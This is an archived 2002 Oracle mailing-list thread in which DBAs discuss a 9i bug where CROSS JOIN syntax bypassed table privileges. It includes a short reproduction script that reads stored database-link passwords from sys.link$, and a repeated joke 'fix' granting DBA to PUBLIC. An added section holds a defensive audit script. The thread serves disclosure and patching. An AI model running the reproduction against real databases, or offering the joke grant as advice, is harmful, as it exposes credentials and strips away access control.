Re: Security Hole
It's even worse if British-style humor is involved. Only Australians, Danes and crazy people will understand it, then. I still like the Grant Any Dictionary command, Connor. Let's try it at Oracle World in Copenhagen...

Mogens

[EMAIL PROTECTED] wrote:

Khe, khe, I would like to oppose a little bit:
1. Healthy humor is always good.
2. If people are so inexperienced that they cannot understand this particular joke, then there is no place for them in at least a production DB.

Gints Plivna
IT Sistēmas, Merķeļa 13, LV1050 Rīga
http://www.itsystems.lv/gints/

"Dale Edgar" [EMAIL PROTECTED]
Sent by: [EMAIL PROTECTED]
2002.04.17 15:28
Please respond to ORACLE-L

To: Multiple recipients of list ORACLE-L [EMAIL PROTECTED]
cc:
Subject: Re: Security Hole

The problem can be worked around by issuing:

grant dba, select any table, select any dictionary to public;

Then the bug does not appear to be observed :-)

A note of caution. One has to be a bit careful with this sort of joke around inexperienced people. The humor of the joke is largely based on the magnitude of the consequences and requires prior knowledge of those consequences. Since these types of joke are largely said in mock seriousness, inexperienced people can miss the point and take it as real advice. The problem is even greater if your audience contains people for whom English is a second language.

For example, I once worked on an oil rig where the new guy was tasked with cleaning some grease off the deck. He enquired, quite innocently, as to what he should use to help get the grease up. Someone replied "Oh, just use the Sodium Hydroxide, that'll get it good and clean". It was common knowledge that Sodium Hydroxide (a strong base) is one of the most corrosive things around, and to use it you get kitted out in all sorts of thick rubber gear and require special training. It's nasty, nasty stuff and you would never use it for casual cleaning - which was the point of the joke.

However, the new guy didn't know this and went ahead and used it - and lost most of both hands.

Just my $0.02
- Dale
--
Check out the free DataBee DBATool - http://www.databee.com/dt_home.htm

--
Please see the official ORACLE-L FAQ: http://www.orafaq.com
--
Author: Dale Edgar
INET: [EMAIL PROTECTED]

Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
San Diego, California -- Public Internet access / Mailing Lists
To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).
Re: Security Hole
For those of you with Metalink access, there is now a patch to this bug for 9.0.1.3. Patch number is 2121935.

Platforms covered are:
HP 9000 series HP-UX 64-bit
Sun Sparc Solaris 64-bit
IBM RS/6000 64-bit
Sun Sparc Solaris
Digital Alpha OpenVMS
LINUX Intel
Compaq Tru64 UNIX

Jonathan Lewis
http://www.jlcomp.demon.co.uk

Author of:
Practical Oracle 8i: Building Efficient Databases

Next Seminar - Australia - July/August
http://www.jlcomp.demon.co.uk/seminar.html

Host to The Co-Operative Oracle Users' FAQ
http://www.jlcomp.demon.co.uk/faq/ind_faq.html

-----Original Message-----
To: [EMAIL PROTECTED] [EMAIL PROTECTED]
Date: 16 April 2002 11:37

|This just in from comp.databases.oracle.server.
|
|See metalink bug 2121935.
|
|Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc)
|allows you to view data from tables on which you have no
|privilege. For example, try this COMPLETE script:
|
|connect / as sysdba
|create user us1 identified by us1;
|grant create session to us1;
|
|connect us1/us1
|
|select userid, password
|from
|sys.link$ cross join dual
|;
|
|Worse still, if you have the privilege to create views
|then this loophole allows you to seek and destroy
|ANY DATA in the database that you might want to.
|
|The bug is fixed in 9iR2. I didn't see any note
|about a backport, or a security alert on OTN.
|
|Conclusion:
|
|9.0.1 should not be in use on a production system
|until Oracle supplies a fix.
|
|Jonathan Lewis
|http://www.jlcomp.demon.co.uk

--
Author: Jonathan Lewis
RE: Security Hole
I wonder how many people have rushed out to do this on their production instances now? ;P

-----Original Message-----
From: Connor McDonald
Sent: 16 April 2002 23:23
To: Multiple recipients of list ORACLE-L
Subject: Re: Security Hole

The problem can be worked around by issuing:

grant dba, select any table, select any dictionary to public;

Then the bug does not appear to be observed :-)

Connor

--- Anjo Kolk [EMAIL PROTECTED] wrote:

There should be an emergency backport available for that fix/problem. If not, who wants to use 9i release 1 ?

Anjo.

Mark Leith wrote:

9i - Can't break it, can't break in! ?!?!? ;0P

-----Original Message-----
From: Jonathan Lewis
Sent: 16 April 2002 12:33
To: Multiple recipients of list ORACLE-L
Subject: Security Hole

This just in from comp.databases.oracle.server. See metalink bug 2121935. [...]

Jonathan Lewis
http://www.jlcomp.demon.co.uk

=
Connor McDonald
http://www.oracledba.co.uk
(mirrored at http://www.oradba.freeserve.co.uk)

Some days you're the pigeon, some days you're the statue

--
Author: Mark Leith
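An added example, not from anyone in this thread: an Oracle SQL*Plus audit script a DBA can run to confirm that nobody actually applied the joke "workaround" above, that the us1 test account created by the reproduction script has been cleaned up, and which release the instance reports. It uses only standard data dictionary views (dba_sys_privs, dba_role_privs, dba_users, v$version) and assumes it is run from a DBA session.

```sql
-- Added audit script (not from the thread). Run as a DBA, e.g. connect / as sysdba.

-- 1. Has anyone granted PUBLIC the privileges from the joke "workaround"?
--    Expected result on a sane instance: no rows from either query.
select grantee, privilege, admin_option
from   dba_sys_privs
where  grantee = 'PUBLIC'
and    privilege in ('SELECT ANY TABLE', 'SELECT ANY DICTIONARY');

select grantee, granted_role, admin_option
from   dba_role_privs
where  grantee = 'PUBLIC'
and    granted_role = 'DBA';

-- If either query returns rows, the grants were applied for real; undo them.
-- (Uncomment only after confirming the rows above.)
-- revoke dba, select any table, select any dictionary from public;

-- 2. The reproduction script creates user US1 with password us1 and never
--    drops it. A leftover test account with a known password is its own finding.
select username, created, account_status
from   dba_users
where  username = 'US1';
-- drop user us1 cascade;

-- 3. Which release is this? The thread says 9.0.1 is affected, 9.2 is fixed,
--    and a patch exists for 9.0.1.3 (Metalink bug 2121935).
select banner from v$version where banner like 'Oracle%';

-- 4. After patching, re-run the thread's test connected as the low-privileged
--    user: "select userid, password from sys.link$ cross join dual" should
--    fail with ORA-00942 (table or view does not exist), as it does on 8i.
```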
Re: Security Hole
Is this on 9i databases or is 8 involved?

Ruth

----- Original Message -----
From: Jonathan Lewis
To: Multiple recipients of list ORACLE-L [EMAIL PROTECTED]
Sent: Tuesday, April 16, 2002 7:33 AM
Subject: Security Hole

This just in from comp.databases.oracle.server. See metalink bug 2121935. [...]

--
Author: Ruth Gramolini
RE: Security Hole
9i - Can't break it, can't break in! ?!?!? ;0P

-----Original Message-----
From: Jonathan Lewis
Sent: 16 April 2002 12:33
To: Multiple recipients of list ORACLE-L
Subject: Security Hole

This just in from comp.databases.oracle.server. See metalink bug 2121935. [...]

--
Author: Mark Leith
RE: Security Hole
It appeared in 9i and is fixed in 9.2. 8i is not affected as it does not have cross joins.

From Metalink Note 137286.1:

Oracle9i introduces the following SQL:1999-compliant joins:
1.1 CROSS Join
1.2 NATURAL Join
1.3 OUTER Join
1.3.1 LEFT OUTER Join
1.3.2 RIGHT OUTER Join
1.3.3 FULL OUTER Join

1.1 CROSS Join
--------------
A CROSS join is the cross-product of two tables. It is the equivalent of a Cartesian product.
---

I tried the query with a Cartesian product in 8i and it didn't work.

select userid,password from sys.link$, dual
                            *
ERROR at line 1:
ORA-00942: table or view does not exist

-----Original Message-----
From: Ruth Gramolini [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, April 16, 2002 8:38 AM
To: Multiple recipients of list ORACLE-L
Subject: Re: Security Hole

Is this on 9i databases or is 8 involved?

Ruth

----- Original Message -----
From: Jonathan Lewis
To: Multiple recipients of list ORACLE-L [EMAIL PROTECTED]
Sent: Tuesday, April 16, 2002 7:33 AM
Subject: Security Hole

This just in from comp.databases.oracle.server. See metalink bug 2121935. [...]

--
Author: Glenn Travis
RE: Security Hole
I forwarded it to SANS.

Regards,
Patrice Boivin
Systems Analyst (Oracle Certified DBA)

Systems Admin Operations | Admin. et Exploit. des systèmes
Technology Services | Services technologiques
Informatics Branch | Direction de l'informatique
Maritimes Region, DFO | Région des Maritimes, MPO

E-Mail: [EMAIL PROTECTED]

-----Original Message-----
From: Jonathan Lewis
Sent: Tuesday, April 16, 2002 8:33 AM
To: Multiple recipients of list ORACLE-L
Subject: Security Hole

This just in from comp.databases.oracle.server. See metalink bug 2121935. [...]

--
Author: Boivin, Patrice J
Re: Security Hole
Thanks!
RBG

----- Original Message -----
From: Jonathan Lewis
To: Multiple recipients of list ORACLE-L [EMAIL PROTECTED]
Sent: Tuesday, April 16, 2002 10:13 AM
Subject: Re: Security Hole

Oracle 9 only. Oracle 8 does not support ANSI join syntax.

Jonathan Lewis
http://www.jlcomp.demon.co.uk

-----Original Message-----
From: Ruth Gramolini
To: Multiple recipients of list ORACLE-L [EMAIL PROTECTED]
Date: 16 April 2002 13:47

|Is this on 9i databases or is 8 involved?
|Ruth
|
|----- Original Message -----
|From: Jonathan Lewis
|To: Multiple recipients of list ORACLE-L [EMAIL PROTECTED]
|Sent: Tuesday, April 16, 2002 7:33 AM
|
| This just in from comp.databases.oracle.server. See metalink bug 2121935. [...]

--
Author: Ruth Gramolini
RE: Security Hole
Glenn, did the user have access to LINK$? It's common practice to restrict access to that table.

Cheers,
Mike

-----Original Message-----
From: Glenn Travis
Sent: Tuesday, April 16, 2002 3:39 PM
To: Multiple recipients of list ORACLE-L
Subject: RE: Security Hole

It appeared in 9i and is fixed in 9.2. 8i is not affected as it does not have cross joins. [...]
RE: Security Hole
Mike, that is the beauty of this bug, you don't need access to link$ for this to work.

Raj
__
Rajendra Jamadagni
MIS, ESPN Inc.
Rajendra dot Jamadagni at ESPN dot com
Any opinion expressed here is personal and doesn't reflect that of ESPN Inc.
QOTD: Any clod can have facts, but having an opinion is an art!

-----Original Message-----
From: Mike
Sent: Tuesday, April 16, 2002 11:39 AM
To: Multiple recipients of list ORACLE-L
Subject: RE: Security Hole

Glenn, did the user have access to LINK$? It's common practice to restrict access to that table.

Cheers,
Mike
Re: Security Hole
There should be an emergency backport available for that fix/problem. If not, who wants to use 9i release 1 ?

Anjo.

Mark Leith wrote:

9i - Can't break it, can't break in! ?!?!? ;0P

-----Original Message-----
From: Jonathan Lewis
Sent: 16 April 2002 12:33
To: Multiple recipients of list ORACLE-L
Subject: Security Hole

This just in from comp.databases.oracle.server. See metalink bug 2121935. [...]

--
Author: Anjo Kolk
Re: Security Hole
The problem can be worked around by issuing:

grant dba, select any table, select any dictionary to public;

Then the bug does not appear to be observed :-)

Connor

--- Anjo Kolk [EMAIL PROTECTED] wrote:

There should be an emergency backport available for that fix/problem. If not, who wants to use 9i release 1 ?

Anjo.

Mark Leith wrote:

9i - Can't break it, can't break in! ?!?!? ;0P

-----Original Message-----
From: Jonathan Lewis
Sent: 16 April 2002 12:33
To: Multiple recipients of list ORACLE-L
Subject: Security Hole

This just in from comp.databases.oracle.server. See metalink bug 2121935. [...]

=
Connor McDonald
http://www.oracledba.co.uk
(mirrored at http://www.oradba.freeserve.co.uk)

Some days you're the pigeon, some days you're the statue

--
Author: Connor McDonald